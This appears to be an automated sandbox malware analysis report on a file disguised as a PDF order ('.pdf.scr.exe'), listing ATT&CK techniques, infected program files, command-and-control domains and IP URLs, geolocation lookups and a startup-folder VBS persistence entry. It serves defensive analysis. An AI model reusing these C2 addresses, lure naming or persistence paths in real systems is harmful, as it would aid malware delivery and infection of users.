Source: Yara match	File source: Process Memory Space: server02.exe PID: 7664, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0045923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_0045923B
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00458C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00458C4F

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	121 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	111 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	4 Native API	2 LSASS Driver	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	1 DLL Side-Loading	2 LSASS Driver	1 Abuse Elevation Control Mechanism	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	2 Valid Accounts	1 DLL Side-Loading	14 Obfuscated Files or Information	NTDS	138 System Information Discovery	Distributed Component Object Model	121 Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 Service Execution	1 Windows Service	2 Valid Accounts	1 Direct Volume Access	LSA Secrets	1 Query Registry	SSH	4 Clipboard Data	25 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	1 Scheduled Task/Job	21 Access Token Manipulation	1 Software Packing	Cached Domain Credentials	361 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	2 Registry Run Keys / Startup Folder	1 Windows Service	1 Timestomp	DCSync	141 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	312 Process Injection	1 DLL Side-Loading	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	1 Scheduled Task/Job	322 Masquerading	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	141 Virtualization/Sandbox Evasion	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	21 Access Token Manipulation	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	312 Process Injection	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Order SMG 201906 20190816order.pdf.scr.exe	83%	Virustotal		Browse
Order SMG 201906 20190816order.pdf.scr.exe	84%	ReversingLabs	Win32.Virus.Expiro
Order SMG 201906 20190816order.pdf.scr.exe	100%	Avira	W32/Infector.Gen
Order SMG 201906 20190816order.pdf.scr.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
uaafd.biz	14%	Virustotal	Browse
s82.gocheapweb.com	1%	Virustotal	Browse
vjaxhpbji.biz	14%	Virustotal	Browse
pywolwnvd.biz	16%	Virustotal	Browse

Name	IP	Active	Malicious	Antivirus Detection
uaafd.biz	3.254.94.185	true	false	14%, Virustotal, Browse
vjaxhpbji.biz	82.112.184.197	true	true	14%, Virustotal, Browse
pywolwnvd.biz	54.244.188.177	true	true	16%, Virustotal, Browse
s82.gocheapweb.com	51.195.88.199	true	true	1%, Virustotal, Browse
ytctnunms.biz	3.94.10.34	true	false
lrxdmhrr.biz	54.244.188.177	true	true
vrrazpdh.biz	18.246.231.120	true	true
ctdtgwag.biz	3.94.10.34	true	false
tbjrpv.biz	34.246.200.160	true	false
hehckyov.biz	44.221.84.105	true	false
xlfhhhm.biz	47.129.31.212	true	false
warkcdu.biz	18.141.10.107	true	false
npukfztj.biz	44.221.84.105	true	false
sxmiywsfv.biz	13.251.16.150	true	false
przvgke.biz	172.234.222.143	true	false
dwrqljrr.biz	54.244.188.177	true	true
gytujflc.biz	208.100.26.245	true	true
gvijgjwkh.biz	3.94.10.34	true	false
gnqgo.biz	18.208.156.248	true	false
reallyfreegeoip.org	172.67.177.134	true	true
deoci.biz	18.208.156.248	true	false
iuzpxe.biz	13.251.16.150	true	false
checkip.dyndns.com	158.101.44.242	true	false
nqwjmb.biz	35.164.78.200	true	false
wllvnzb.biz	18.141.10.107	true	false
cvgrf.biz	54.244.188.177	true	true
lpuegx.biz	82.112.184.197	true	true
bumxkqgxu.biz	44.221.84.105	true	false
yhqqc.biz	18.246.231.120	true	true
api.ipify.org	104.26.12.205	true	false
vcddkls.biz	18.141.10.107	true	false
vyome.biz	18.246.231.120	true	true
dlynankz.biz	85.214.228.140	true	false
gcedd.biz	13.251.16.150	true	false
xccjj.biz	18.246.231.120	true	true
oshhkdluh.biz	54.244.188.177	true	true
opowhhece.biz	18.208.156.248	true	false
jwkoeoqns.biz	18.208.156.248	true	false
jpskm.biz	18.246.231.120	true	true
ftxlah.biz	47.129.31.212	true	false
ifsaia.biz	13.251.16.150	true	false
rynmcq.biz	54.244.188.177	true	true
oflybfv.biz	47.129.31.212	true	false
jhvzpcfg.biz	44.221.84.105	true	false
tnevuluw.biz	35.164.78.200	true	false
saytjshyf.biz	44.221.84.105	true	false
fwiwk.biz	172.234.222.143	true	false
rrqafepng.biz	47.129.31.212	true	false
typgfhb.biz	13.251.16.150	true	false
esuzf.biz	18.246.231.120	true	true
eufxebus.biz	18.141.10.107	true	false
myups.biz	165.160.15.20	true	false
pwlqfu.biz	34.246.200.160	true	false
yauexmxk.biz	18.208.156.248	true	false
ssbzmoy.biz	18.141.10.107	true	false
knjghuig.biz	18.141.10.107	true	false
yunalwv.biz	208.100.26.245	true	true
brsua.biz	3.254.94.185	true	false
mgmsclkyu.biz	34.246.200.160	true	false
qaynky.biz	13.251.16.150	true	false
qpnczch.biz	18.246.231.120	true	true
mnjmhp.biz	47.129.31.212	true	false
acwjcqqv.biz	18.141.10.107	true	false
jdhhbs.biz	13.251.16.150	true	false
anpmnmxo.biz	unknown	unknown	true
zjbpaao.biz	unknown	unknown	true
checkip.dyndns.org	unknown	unknown	true
uhxqin.biz	unknown	unknown	true
zlenh.biz	unknown	unknown	true
lejtdj.biz	unknown	unknown	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ytctnunms.biz/acnoqimrskbkvnwq	false
http://eufxebus.biz/dw	false
http://brsua.biz/qafronspqjihpms	false
http://gcedd.biz/xindlfknrhvc	false
http://typgfhb.biz/l	false
http://uaafd.biz/rmkysabgpk	true
http://jwkoeoqns.biz/mfrwurnrh	false
http://jpskm.biz/xkeryphtb	true
http://yunalwv.biz/wo	true
http://dwrqljrr.biz/xfxdrndh	true
http://vjaxhpbji.biz/smway	true
http://tbjrpv.biz/do	false
http://checkip.dyndns.org/	false
http://fwiwk.biz/lrhpwoxhabbo	false
http://pywolwnvd.biz/chev	true
http://oshhkdluh.biz/knkyl	true
http://hehckyov.biz/ircdert	false
http://dlynankz.biz/tqsyw	false
http://yunalwv.biz/x	true
https://reallyfreegeoip.org/xml/8.46.123.228	false
http://gytujflc.biz/qborytaxfey	true
http://gytujflc.biz/vfyfu	true
http://pywolwnvd.biz/hofte	true
http://opowhhece.biz/yy	false
http://qaynky.biz/nrq	false
http://myups.biz/mghrypnodi	false
http://acwjcqqv.biz/kta	false
http://deoci.biz/rioahhbhdoogcd	false
http://dlynankz.biz/qij	false
http://pywolwnvd.biz/wblsu	true
http://ssbzmoy.biz/qwhxdc	false
http://lpuegx.biz/lmjmtfvnnmvba	true
http://vjaxhpbji.biz/cnuoabdloqrfy	true
http://saytjshyf.biz/wrtcay	false
http://pywolwnvd.biz/hfbsoyybcej	true
http://oflybfv.biz/qvfjyyauphqhfohc	false
http://vcddkls.biz/fffkga	false
http://jdhhbs.biz/j	false
http://xccjj.biz/reejrob	true
http://vyome.biz/eat	true
http://nqwjmb.biz/vnerdykqwl	false
http://knjghuig.biz/dss	false
http://lpuegx.biz/abs	true
http://bumxkqgxu.biz/douphuxkjsfcbawq	false
http://ifsaia.biz/qcekrwvgvvohof	false
http://xlfhhhm.biz/woygorb	false
http://vrrazpdh.biz/c	true
http://gnqgo.biz/lir	false
http://lrxdmhrr.biz/jbjdkjesppdqiqdm	true
http://rynmcq.biz/msoqwwrwyts	true
http://esuzf.biz/kg	true
http://mnjmhp.biz/kdqjc	false
http://rrqafepng.biz/lrupjiow	false
http://jhvzpcfg.biz/funk	false
http://cvgrf.biz/hn	true
http://przvgke.biz/bgeqs	false
http://mgmsclkyu.biz/q	false
http://yauexmxk.biz/econcn	false
https://api.ipify.org/	false
http://pywolwnvd.biz/tbqsdcfeojy	true
http://iuzpxe.biz/kvfj	false

URLs from Memory and Binaries

Name	Source	Malicious
http://54.244.188.177:80/tbqsdcfeojy	Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000002.1695174150.0000000000E29000.00000004.00000020.00020000.00000000.sdmp	false
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881	alg.exe, 00000002.00000003.2334344927.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	false
http://54.244.188.177/=l	surmit.exe, 00000007.00000002.1724640773.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp	false
http://54.244.188.177/wblsu	surmit.exe, 00000019.00000003.1847655008.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, surmit.exe, 00000019.00000002.1850913885.0000000000C0A000.00000004.00000020.00020000.00000000.sdmp, surmit.exe, 00000019.00000002.1851268257.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp	false
https://aka.ms/pscore6lB	powershell.exe, 0000000E.00000002.1798828520.0000000004C61000.00000004.00000800.00020000.00000000.sdmp	false
http://82.112.184.197/abs/qwhxdc	alg.exe, 00000002.00000003.2306696013.0000000000668000.00000004.00000020.00020000.00000000.sdmp	false
http://checkip.dyndns.org/q	RegSvcs.exe, 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp	false
https://nuget.org/nuget.exe	powershell.exe, 0000000E.00000002.1811588709.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000E.00000002.1798828520.0000000004C61000.00000004.00000800.00020000.00000000.sdmp	false
http://54.244.188.177/a8	Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000002.1695174150.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp	false
https://reallyfreegeoip.org/xml/	RegSvcs.exe, 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000000.1729292004.0000000000882000.00000002.00000001.01000000.0000000A.sdmp	false
https://account.dyn.com/	RegSvcs.exe, 00000009.00000002.1737482854.00000000036A5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1730064175.0000000000E02000.00000002.00000001.01000000.0000000B.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000E.00000002.1798828520.0000000004DB5000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000E.00000002.1798828520.0000000004DB5000.00000004.00000800.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000E.00000002.1798828520.0000000004DB5000.00000004.00000800.00020000.00000000.sdmp	false
http://54.244.188.177/tbqsdcfeojyg	Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000002.1694378797.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	false
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1	alg.exe, 00000002.00000003.2334344927.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	false
https://contoso.com/Icon	powershell.exe, 0000000E.00000002.1811588709.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp	false
https://firefox.settings.services.mozilla.com/v1	alg.exe, 00000002.00000003.2315893021.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 0000000E.00000002.1798828520.0000000004DB5000.00000004.00000800.00020000.00000000.sdmp	false
http://54.244.188.177:80/chev	surmit.exe, 0000001C.00000002.1903481780.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp	false
http://54.244.188.177/chev	surmit.exe, surmit.exe, 0000001C.00000002.1903481780.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, surmit.exe, 0000001C.00000002.1902809636.0000000000BA4000.00000040.00000020.00020000.00000000.sdmp	false
http://54.244.188.177/hfbsoyybcej	surmit.exe, 00000007.00000002.1724557025.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000E.00000002.1798828520.0000000004DB5000.00000004.00000800.00020000.00000000.sdmp	false
http://54.244.188.177:80/hofte	alg.exe, 00000002.00000003.1705755839.0000000000637000.00000004.00000020.00020000.00000000.sdmp	false
http://172.234.222.143/bgeqsgd	alg.exe, 00000002.00000003.1802330487.0000000000660000.00000004.00000020.00020000.00000000.sdmp	false
http://82.112.184.197/	alg.exe, 00000002.00000003.2314035971.0000000000684000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2306012228.0000000000680000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/License	powershell.exe, 0000000E.00000002.1811588709.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp	false
http://44.221.84.105/cvmmqsiwgd	alg.exe, 00000002.00000003.1784297308.000000000065C000.00000004.00000020.00020000.00000000.sdmp	false
http://54.244.188.177/hofte	alg.exe, 00000002.00000003.1705620612.000000000065D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1705755839.000000000063D000.00000004.00000020.00020000.00000000.sdmp	false
https://api.ipify.org	RegSvcs.exe, 00000009.00000002.1737482854.00000000036A5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1737482854.00000000037E6000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1730064175.0000000000E02000.00000002.00000001.01000000.0000000B.sdmp	false
https://contoso.com/	powershell.exe, 0000000E.00000002.1811588709.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp	false
http://54.244.188.177/tbqsdcfeojyGE	Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000002.1695070518.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp	false
http://www.autoitscript.com/autoit3/8	alg.exe, 00000002.00000003.2442001038.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2430468559.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	false
http://54.244.188.177/hfbsoyybcejgs	surmit.exe, 00000007.00000002.1724557025.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	false
https://www.autoitscript.com/site/autoit/8	alg.exe, 00000002.00000003.2477947138.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	false
http://54.244.188.177/	alg.exe, 00000002.00000003.1705755839.000000000063D000.00000004.00000020.00020000.00000000.sdmp, surmit.exe, 00000007.00000002.1724640773.0000000000D33000.00000004.00000020.00020000.00000000.sdmp, surmit.exe, 00000019.00000003.1847655008.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, surmit.exe, 00000019.00000002.1851268257.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, surmit.exe, 00000019.00000002.1850387943.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, surmit.exe, 0000001C.00000002.1903481780.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp	false
http://nuget.org/NuGet.exe	powershell.exe, 0000000E.00000002.1811588709.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp	false
https://crash-reports.mozilla.com/submit?id=	alg.exe, 00000002.00000003.2334264926.00000000004C0000.00000004.00001000.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
165.160.15.20	myups.biz	United States	19574	CSCUS	false
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
3.254.94.185	uaafd.biz	United States	16509	AMAZON-02US	false
3.94.10.34	ytctnunms.biz	United States	14618	AMAZON-AESUS	false
34.246.200.160	tbjrpv.biz	United States	16509	AMAZON-02US	false
172.234.222.143	przvgke.biz	United States	20940	AKAMAI-ASN1EU	false
18.208.156.248	gnqgo.biz	United States	14618	AMAZON-AESUS	false
208.100.26.245	gytujflc.biz	United States	32748	STEADFASTUS	true
35.164.78.200	nqwjmb.biz	United States	16509	AMAZON-02US	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
51.195.88.199	s82.gocheapweb.com	France	16276	OVHFR	true
44.221.84.105	hehckyov.biz	United States	14618	AMAZON-AESUS	false
85.214.228.140	dlynankz.biz	Germany	6724	STRATOSTRATOAGDE	false
54.244.188.177	pywolwnvd.biz	United States	16509	AMAZON-02US	true
13.251.16.150	sxmiywsfv.biz	United States	16509	AMAZON-02US	false
47.129.31.212	xlfhhhm.biz	Canada	34533	ESAMARA-ASRU	false
18.246.231.120	vrrazpdh.biz	United States	16509	AMAZON-02US	true
82.112.184.197	vjaxhpbji.biz	Russian Federation	43267	FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU	true
18.141.10.107	warkcdu.biz	United States	16509	AMAZON-02US	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1564299
Start date and time:	2024-11-28 06:40:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 17m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	3
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Order SMG 201906 20190816order.pdf.scr.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winEXE@52/176@75/20
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 74% Number of executed functions: 62 Number of non-executed functions: 293
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, DiagnosticsHub.StandardCollector.Service.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target TrojanAI.exe, PID 7576 because it is empty
Execution Graph export aborted for target TrojanAI.exe, PID 7644 because it is empty
Execution Graph export aborted for target TrojanAIbot.exe, PID 7660 because it is empty
Execution Graph export aborted for target TrojanAIbot.exe, PID 8080 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7828 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:41:02	API Interceptor	63x Sleep call for process: alg.exe modified
00:41:04	API Interceptor	1x Sleep call for process: surmit.exe modified
00:41:08	API Interceptor	22x Sleep call for process: powershell.exe modified
00:41:08	API Interceptor	5125238x Sleep call for process: neworigin.exe modified
00:41:09	API Interceptor	2284741x Sleep call for process: TrojanAIbot.exe modified
00:43:32	API Interceptor	200x Sleep call for process: msdtc.exe modified
00:44:04	API Interceptor	1x Sleep call for process: elevation_service.exe modified
05:41:03	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\surmit.vbs
